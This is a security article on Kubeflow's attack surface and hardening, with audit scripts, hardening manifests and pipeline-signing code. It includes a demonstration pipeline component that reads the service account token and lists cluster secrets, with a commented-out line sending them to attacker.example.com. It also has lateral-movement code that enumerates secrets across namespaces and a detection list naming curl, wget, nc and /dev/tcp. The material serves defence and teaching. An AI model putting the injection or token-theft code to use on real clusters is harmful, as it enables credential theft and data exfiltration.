Kubeflow Security
Security assessment and hardening of Kubeflow ML pipeline deployments on Kubernetes.
Overview
Kubeflow is an open-source ML platform built on Kubernetes that provides components for every stage of the ML lifecycle: notebook servers for experimentation, Kubeflow Pipelines for workflow orchestration, KServe (formerly KFServing) for model serving, Katib for hyperparameter tuning, and a training operator for distributed training. Each component runs as a Kubernetes deployment with its own service account, network exposure, and access to cluster resources.
The security challenge with Kubeflow is that it layers a complex multi-component ML platform on top of an already complex Kubernetes infrastructure. Each component introduces its own attack surface, and the interactions between components create additional risks. A compromised notebook server can access pipeline secrets, a malicious pipeline step can exfiltrate training data, and a vulnerable KServe deployment can serve poisoned models.
Kubeflow deployments have been the subject of real-world attacks. In 2020, Microsoft reported that attackers targeted misconfigured Kubeflow dashboards exposed to the internet to deploy cryptocurrency miners on the underlying Kubernetes clusters. The fundamental issue was the same as with MLflow: the default deployment prioritizes developer convenience over security, and many organizations deploy Kubeflow without hardening it.
This article covers the attack surface of each Kubeflow component, provides practical assessment techniques, and details the hardening steps required for production deployments. The attacks described here map to MITRE ATLAS techniques for ML infrastructure exploitation.
Kubeflow Architecture and Attack Surface
Component Map
┌──────────────────────────────────────────────────────────┐
│ Kubeflow Dashboard │
│ (Istio VirtualService / Ingress) │
├──────────┬──────────┬──────────┬──────────┬──────────────┤
│ Notebook │ Pipeline │ KServe │ Katib │ Training │
│ Servers │ Service │ (Serving)│ (HPO) │ Operator │
├──────────┴──────────┴──────────┴──────────┴──────────────┤
│ Kubernetes Cluster (RBAC, NetworkPolicy) │
├──────────────────────────────────────────────────────────┤
│ Storage (PVCs, S3, MinIO) + GPU Resources │
└──────────────────────────────────────────────────────────┘
Each component has its own attack surface:
| Component | Attack Surface | Key Risks |
|---|---|---|
| Central Dashboard | Web UI, Istio ingress | Authentication bypass, SSRF |
| Notebook Servers | Jupyter environments with cluster access | Code execution, lateral movement |
| Pipelines | Argo Workflows, pipeline definitions | Pipeline injection, secret exfiltration |
| KServe | Model serving inference endpoints | Model poisoning, DoS |
| Katib | Hyperparameter tuning controller | Resource exhaustion, config tampering |
| Training Operator | TFJob, PyTorchJob, MPIJob | Privilege escalation via training pods |
Authentication and Multi-Tenancy
Kubeflow uses Istio for network routing and optionally integrates with Dex or another OIDC provider for authentication. If no identity provider is configured, anyone who can reach the Istio ingress can reach the dashboard. Multi-tenancy is implemented through Kubernetes namespaces — each user or team gets a Profile custom resource that maps to a dedicated namespace.
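Namespace isolation only holds if every Profile really maps to a namespace with a known owner. A minimal sketch of auditing that mapping, assuming the JSON shape of `kubectl get profiles.kubeflow.org -o json` (the `sample` document below is illustrative, not taken from a real cluster):

```python
"""Sketch: enumerate Kubeflow Profiles and the owner behind each namespace."""
from typing import Any, Dict, List


def audit_profiles(profiles: Dict[str, Any]) -> List[Dict[str, str]]:
    """Return one record per Profile: the namespace it owns and its owner."""
    records = []
    for item in profiles.get("items", []):
        owner = item.get("spec", {}).get("owner", {})
        records.append({
            # A Profile's name doubles as the name of the namespace it creates
            "namespace": item.get("metadata", {}).get("name", ""),
            "owner_kind": owner.get("kind", "unknown"),
            "owner_name": owner.get("name", "unknown"),
        })
    return records


# Illustrative stand-in for the kubectl output
sample = {
    "items": [
        {"metadata": {"name": "team-alpha"},
         "spec": {"owner": {"kind": "User", "name": "alice@example.com"}}},
        {"metadata": {"name": "team-beta"},
         "spec": {}},  # no owner recorded: worth investigating
    ]
}

for record in audit_profiles(sample):
    print(record)
```

Profiles with no recorded owner, or owners that no longer exist in the identity provider, are orphaned namespaces that nobody is accountable for.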
import subprocess
import json
from typing import Dict, List, Any
class KubeflowSecurityScanner:
"""Scan a Kubeflow deployment for security misconfigurations."""
def __init__(self, namespace: str = "kubeflow"):
self.namespace = namespace
def _kubectl(self, *args) -> str:
"""Run a kubectl command and return output."""
result = subprocess.run(
["kubectl", *args],
capture_output=True, text=True, timeout=30,
)
return result.stdout
def check_dashboard_exposure(self) -> Dict[str, Any]:
"""Check if the Kubeflow dashboard is externally accessible."""
# Check for LoadBalancer or NodePort services
services = json.loads(
self._kubectl("get", "svc", "-n", "istio-system", "-o", "json")
)
findings = []
for svc in services.get("items", []):
svc_type = svc.get("spec", {}).get("type", "ClusterIP")
name = svc.get("metadata", {}).get("name", "")
if svc_type in ("LoadBalancer", "NodePort"):
external_ip = None
if svc_type == "LoadBalancer":
ingress = svc.get("status", {}).get("loadBalancer", {}).get("ingress", [])
if ingress:
external_ip = ingress[0].get("ip") or ingress[0].get("hostname")
findings.append({
"service": name,
"type": svc_type,
"external_ip": external_ip,
"severity": "high",
"finding": f"Istio service '{name}' is externally accessible via {svc_type}",
})
return {"findings": findings}
def check_rbac_permissions(self) -> List[Dict]:
"""Audit RBAC permissions for Kubeflow service accounts."""
findings = []
# Get all service accounts in the kubeflow namespace
sa_json = json.loads(
self._kubectl("get", "sa", "-n", self.namespace, "-o", "json")
)
for sa in sa_json.get("items", []):
sa_name = sa.get("metadata", {}).get("name", "")
# Check what each service account can do
result = subprocess.run(
["kubectl", "auth", "can-i", "--list",
f"--as=system:serviceaccount:{self.namespace}:{sa_name}"],
capture_output=True, text=True, timeout=30,
)
            # `kubectl auth can-i --list` prints columns:
            #   Resources  Non-Resource URLs  Resource Names  Verbs
            # so a phrase like "create pods" never appears verbatim; match
            # on the resource column and flag wildcards, secrets, and
            # pod exec/create instead.
            for line in result.stdout.splitlines()[1:]:  # skip the header row
                parts = line.split()
                if not parts:
                    continue
                resource = parts[0].lower()
                verbs = line.lower()
                if (resource in ("*.*", "*", "secrets", "pods/exec")
                        or (resource == "pods"
                            and ("create" in verbs or "[*]" in verbs))):
                    findings.append({
                        "service_account": sa_name,
                        "permission": line.strip(),
                        "severity": "high",
                        "finding": f"Service account '{sa_name}' has elevated permissions",
                    })
return findings
def check_network_policies(self) -> Dict[str, Any]:
"""Check for network policy enforcement."""
policies = json.loads(
self._kubectl("get", "networkpolicy", "-n", self.namespace, "-o", "json")
)
policy_count = len(policies.get("items", []))
if policy_count == 0:
return {
"severity": "high",
"finding": "No NetworkPolicies in kubeflow namespace",
"detail": "All pods can communicate freely with each other and external services",
"remediation": "Apply default-deny NetworkPolicy and whitelist required traffic",
}
return {
"severity": "info",
"finding": f"{policy_count} NetworkPolicies found",
"policies": [
p.get("metadata", {}).get("name") for p in policies.get("items", [])
],
        }
Notebook Server Exploitation
Attack Vector: Notebook to Cluster
Kubeflow notebook servers are Jupyter environments that run as Kubernetes pods. They are intended for data science experimentation, but they provide a powerful attack platform because:
- They run with a service account that may have broad Kubernetes API access
- They can mount PersistentVolumeClaims containing training data
- They have network access to other Kubeflow services
- They can execute arbitrary code by design
"""
Demonstration: Lateral movement from a compromised Kubeflow notebook server.
This shows what an attacker can do after gaining access to a notebook.
"""
import subprocess
import json
from typing import List, Dict
class NotebookLateralMovement:
"""Assess lateral movement paths from a Kubeflow notebook server."""
def discover_service_account(self) -> Dict:
"""Discover the service account token mounted in this pod."""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
try:
with open(token_path) as f:
token = f.read().strip()
with open(namespace_path) as f:
namespace = f.read().strip()
return {
"has_token": True,
"namespace": namespace,
"token_preview": token[:20] + "...",
}
except FileNotFoundError:
return {"has_token": False}
def enumerate_accessible_secrets(self) -> List[Dict]:
"""List Kubernetes secrets accessible from this notebook."""
result = subprocess.run(
["kubectl", "get", "secrets", "-o", "json"],
capture_output=True, text=True, timeout=30,
)
if result.returncode != 0:
return [{"error": "Cannot list secrets", "detail": result.stderr}]
secrets = json.loads(result.stdout)
return [
{
"name": s.get("metadata", {}).get("name"),
"type": s.get("type"),
"namespace": s.get("metadata", {}).get("namespace"),
}
for s in secrets.get("items", [])
]
def enumerate_pipeline_artifacts(self) -> List[Dict]:
"""Discover pipeline artifacts accessible from this notebook."""
# Check for MinIO credentials (commonly used by Kubeflow Pipelines)
minio_creds = {}
try:
result = subprocess.run(
["kubectl", "get", "secret", "mlpipeline-minio-artifact",
"-o", "json"],
capture_output=True, text=True, timeout=30,
)
if result.returncode == 0:
secret = json.loads(result.stdout)
minio_creds = {
"found": True,
"keys": list(secret.get("data", {}).keys()),
}
except Exception:
minio_creds = {"found": False}
return [{"minio_credentials": minio_creds}]
def check_cross_namespace_access(self, target_namespace: str) -> Dict:
"""Test if this notebook can access resources in other namespaces."""
checks = {}
# Try to list pods in another namespace
result = subprocess.run(
["kubectl", "get", "pods", "-n", target_namespace],
capture_output=True, text=True, timeout=30,
)
checks["list_pods"] = result.returncode == 0
# Try to list secrets in another namespace
result = subprocess.run(
["kubectl", "get", "secrets", "-n", target_namespace],
capture_output=True, text=True, timeout=30,
)
checks["list_secrets"] = result.returncode == 0
return {
"target_namespace": target_namespace,
"cross_namespace_access": checks,
"severity": "critical" if any(checks.values()) else "info",
        }
Hardening Notebook Servers
# Example: Restricted PodSecurityPolicy for Kubeflow notebooks
# Apply via Kubernetes admission controller or OPA/Gatekeeper
apiVersion: v1
kind: Pod
metadata:
name: notebook-security-example
namespace: kubeflow-user-namespace
spec:
serviceAccountName: restricted-notebook-sa
securityContext:
runAsNonRoot: true
runAsUser: 1000
fsGroup: 100
seccompProfile:
type: RuntimeDefault
containers:
- name: notebook
    image: kubeflownotebookswg/jupyter:latest  # pin a tag or digest in production
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: false # Jupyter needs write access
capabilities:
drop:
- ALL
resources:
limits:
cpu: "4"
memory: "8Gi"
nvidia.com/gpu: "1"
requests:
cpu: "1"
memory: "2Gi"
volumeMounts:
- name: workspace
mountPath: /home/jovyan
volumes:
- name: workspace
persistentVolumeClaim:
      claimName: user-workspace-pvc
Pipeline Security
Pipeline Definition Injection
Kubeflow Pipelines are defined as Python functions using the KFP SDK and compiled into Argo Workflow specifications (YAML). If an attacker can modify a pipeline definition, they can inject arbitrary code that runs with the pipeline's service account permissions.
"""
Demonstration: How pipeline definition injection works.
A malicious pipeline step can exfiltrate data or credentials.
"""
from kfp import dsl
from kfp.dsl import component
# Legitimate pipeline component
@component(base_image="python:3.11-slim")
def train_model(data_path: str, model_path: str) -> str:
"""Normal training step."""
# ... legitimate training code ...
return model_path
# Injected malicious component — could be added by modifying the pipeline source
@component(base_image="python:3.11-slim", packages_to_install=["requests"])
def exfiltrate_secrets() -> str:
"""
Malicious component that exfiltrates Kubernetes secrets.
This demonstrates the risk of pipeline injection.
"""
import subprocess
import requests
# Read the service account token
with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
token = f.read()
    # Enumerate secrets using the Kubernetes API, trusting the cluster CA
    # bundle that is mounted into every pod (without it, wget rejects the
    # API server's certificate)
    result = subprocess.run(
        ["wget", "-qO-",
         "--ca-certificate=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
         "--header", f"Authorization: Bearer {token}",
         "https://kubernetes.default.svc/api/v1/secrets"],
        capture_output=True, text=True,
    )
# In a real attack, this would be exfiltrated to an external server
# requests.post("https://attacker.example.com/collect", data=result.stdout)
return "done"
# Pipeline with injected step
@dsl.pipeline(name="compromised-pipeline")
def compromised_pipeline(data_path: str = "s3://data/train"):
# Legitimate step
train_task = train_model(data_path=data_path, model_path="s3://models/output")
# Injected step — runs with pipeline service account permissions
# This would be hidden in a large pipeline definition
exfil_task = exfiltrate_secrets()
    exfil_task.after(train_task)
Securing Pipeline Definitions
- Sign pipeline definitions and verify signatures before execution
- Review pipeline YAML for unexpected container images or commands
- Restrict pipeline service account permissions to minimum required
- Use admission controllers to block pipelines that reference unauthorized images
import hashlib
import hmac
import json
from typing import Dict
class PipelineIntegrityVerifier:
"""Verify the integrity of Kubeflow pipeline definitions."""
def __init__(self, signing_key: bytes):
self.signing_key = signing_key
def sign_pipeline(self, pipeline_yaml: str) -> str:
"""Create an HMAC signature for a pipeline definition."""
return hmac.new(
self.signing_key,
pipeline_yaml.encode(),
hashlib.sha256,
).hexdigest()
def verify_pipeline(self, pipeline_yaml: str, expected_signature: str) -> bool:
"""Verify a pipeline definition's signature."""
actual_signature = self.sign_pipeline(pipeline_yaml)
return hmac.compare_digest(actual_signature, expected_signature)
def scan_pipeline_for_risks(self, pipeline_spec: Dict) -> list:
"""Scan a compiled pipeline spec for security risks."""
risks = []
templates = pipeline_spec.get("spec", {}).get("templates", [])
allowed_images = {
"python:3.11-slim",
"gcr.io/ml-pipeline/", # Prefix matching
}
for template in templates:
container = template.get("container", {})
image = container.get("image", "")
# Check for unauthorized images
if not any(image.startswith(allowed) for allowed in allowed_images):
risks.append({
"risk": "unauthorized_image",
"template": template.get("name"),
"image": image,
"severity": "high",
})
# Check for privilege escalation
security_ctx = container.get("securityContext", {})
if security_ctx.get("privileged", False):
risks.append({
"risk": "privileged_container",
"template": template.get("name"),
"severity": "critical",
})
# Check for suspicious commands
commands = container.get("command", []) + container.get("args", [])
suspicious = ["curl", "wget", "nc", "ncat", "/dev/tcp"]
for cmd in commands:
for susp in suspicious:
if susp in str(cmd):
risks.append({
"risk": "suspicious_command",
"template": template.get("name"),
"command": cmd,
"severity": "medium",
})
        return risks
KServe Security
KServe (formerly KFServing) is Kubeflow's model serving component. It deploys models as Kubernetes services with autoscaling, canary deployments, and inference graph support.
Key Security Concerns
- Inference endpoints may be exposed without authentication
- Model storage credentials are stored as Kubernetes secrets
- Custom predictor containers can contain arbitrary code
- Inference graphs chain multiple services, amplifying the blast radius of a single compromise
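The first concern, missing endpoint authentication, can be probed directly. A minimal sketch, assuming the KServe v1 inference protocol's `/v1/models/<name>` readiness path (adjust the path and base URL for your gateway — both are assumptions here):

```python
"""Sketch: test whether a KServe inference endpoint enforces authentication."""
import urllib.error
import urllib.request


def classify_status(status: int) -> str:
    """Interpret the HTTP status returned to a credential-free request."""
    if status in (401, 403):
        return "auth-enforced"
    if status in (301, 302, 307):
        return "redirect (possibly to a login page)"
    if 200 <= status < 300:
        # The endpoint answered without any credentials at all
        return "UNAUTHENTICATED ACCESS"
    return f"other ({status})"


def probe_endpoint(base_url: str, model: str, timeout: int = 5) -> str:
    """Send a request with no auth headers and classify the response."""
    url = f"{base_url}/v1/models/{model}"
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_status(resp.status)
    except urllib.error.HTTPError as e:
        return classify_status(e.code)
    except urllib.error.URLError as e:
        return f"unreachable ({e.reason})"


print(classify_status(200))  # UNAUTHENTICATED ACCESS
print(classify_status(403))  # auth-enforced
```

A 2xx response to a request carrying no token means the model is answering anonymous callers; a 401/403 or a redirect to a login page indicates some authentication layer is in front of it.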
#!/bin/bash
# Audit KServe inference services for security issues
echo "=== KServe Security Audit ==="
# List all InferenceServices across namespaces
echo "[*] InferenceServices:"
kubectl get inferenceservice --all-namespaces -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for item in data.get('items', []):
name = item['metadata']['name']
ns = item['metadata']['namespace']
url = item.get('status', {}).get('url', 'N/A')
print(f' {ns}/{name}: {url}')
"
# Check if InferenceServices are exposed externally
echo "[*] External exposure:"
kubectl get svc -n istio-system -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for svc in data.get('items', []):
if svc['spec'].get('type') in ('LoadBalancer', 'NodePort'):
name = svc['metadata']['name']
svc_type = svc['spec']['type']
print(f' WARNING: {name} is exposed via {svc_type}')
"
# Check for model storage secrets
echo "[*] Model storage secrets:"
kubectl get secrets --all-namespaces -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for secret in data.get('items', []):
name = secret['metadata']['name']
if any(kw in name.lower() for kw in ['storage', 'model', 's3', 'gcs', 'azure']):
ns = secret['metadata']['namespace']
print(f' {ns}/{name} (type: {secret.get(\"type\", \"unknown\")})')
"
Network Policies
Default-Deny with Selective Allow
Apply network policies to restrict communication between Kubeflow components:
# Default deny all ingress/egress in Kubeflow namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: kubeflow
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
---
# Allow Kubeflow dashboard to reach pipeline service
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-dashboard-to-pipelines
namespace: kubeflow
spec:
podSelector:
matchLabels:
app: ml-pipeline
ingress:
- from:
- podSelector:
matchLabels:
app: centraldashboard
ports:
- protocol: TCP
port: 8888
---
# Allow pipeline pods to access artifact storage
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-pipeline-to-minio
namespace: kubeflow
spec:
podSelector:
matchLabels:
app: minio
ingress:
- from:
- podSelector:
matchLabels:
pipelines.kubeflow.org/enabled: "true"
ports:
- protocol: TCP
    port: 9000
Defensive Recommendations
- Never expose the Kubeflow dashboard to the internet — use a VPN or identity-aware proxy
- Enable Istio strict mTLS for all inter-service communication
- Apply least-privilege RBAC to all Kubeflow service accounts, especially notebook and pipeline service accounts
- Implement NetworkPolicies with default-deny and explicit allow rules
- Sign and verify pipeline definitions before execution
- Restrict container images in pipelines to an approved registry using an admission controller
- Audit cross-namespace access regularly — notebook servers should not access other users' namespaces
- Monitor for anomalous resource usage that may indicate cryptomining or data exfiltration
- Use OPA/Gatekeeper policies to enforce security constraints on all Kubeflow workloads
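The strict-mTLS recommendation above is easy to verify mechanically. A minimal sketch, assuming the JSON shape of `kubectl get peerauthentications.security.istio.io -A -o json` (the `sample` document below is illustrative):

```python
"""Sketch: flag Istio PeerAuthentication policies that are not strict mTLS."""
from typing import Any, Dict, List


def non_strict_policies(peer_auths: Dict[str, Any]) -> List[str]:
    """Return PeerAuthentication policies whose mTLS mode is not STRICT."""
    weak = []
    for item in peer_auths.get("items", []):
        meta = item.get("metadata", {})
        # An absent mtls.mode means UNSET, which inherits a parent (possibly
        # permissive) setting rather than enforcing strict mTLS itself
        mode = item.get("spec", {}).get("mtls", {}).get("mode", "UNSET")
        if mode != "STRICT":
            weak.append(
                f"{meta.get('namespace')}/{meta.get('name')} (mode={mode})"
            )
    return weak


# Illustrative stand-in for the kubectl output
sample = {
    "items": [
        {"metadata": {"name": "default", "namespace": "istio-system"},
         "spec": {"mtls": {"mode": "STRICT"}}},
        {"metadata": {"name": "legacy", "namespace": "kubeflow"},
         "spec": {"mtls": {"mode": "PERMISSIVE"}}},
    ]
}

print(non_strict_policies(sample))  # ['kubeflow/legacy (mode=PERMISSIVE)']
```

Any PERMISSIVE policy leaves a path for plaintext traffic between pods in that namespace, undermining the mesh-wide strict setting.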
References
- Microsoft Security Blog — "Cryptomining campaigns targeting Kubeflow" (2020) — real-world attack on misconfigured Kubeflow deployments
- Kubeflow Security Documentation — https://www.kubeflow.org/docs/started/security/
- Kubeflow Pipelines — https://www.kubeflow.org/docs/components/pipelines/
- KServe Documentation — https://kserve.github.io/website/
- MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise), AML.T0040 (ML-Enabled Product/Service)
- NIST AI RMF — Govern 1.7 (AI system isolation), Map 3.4 (AI deployment risks)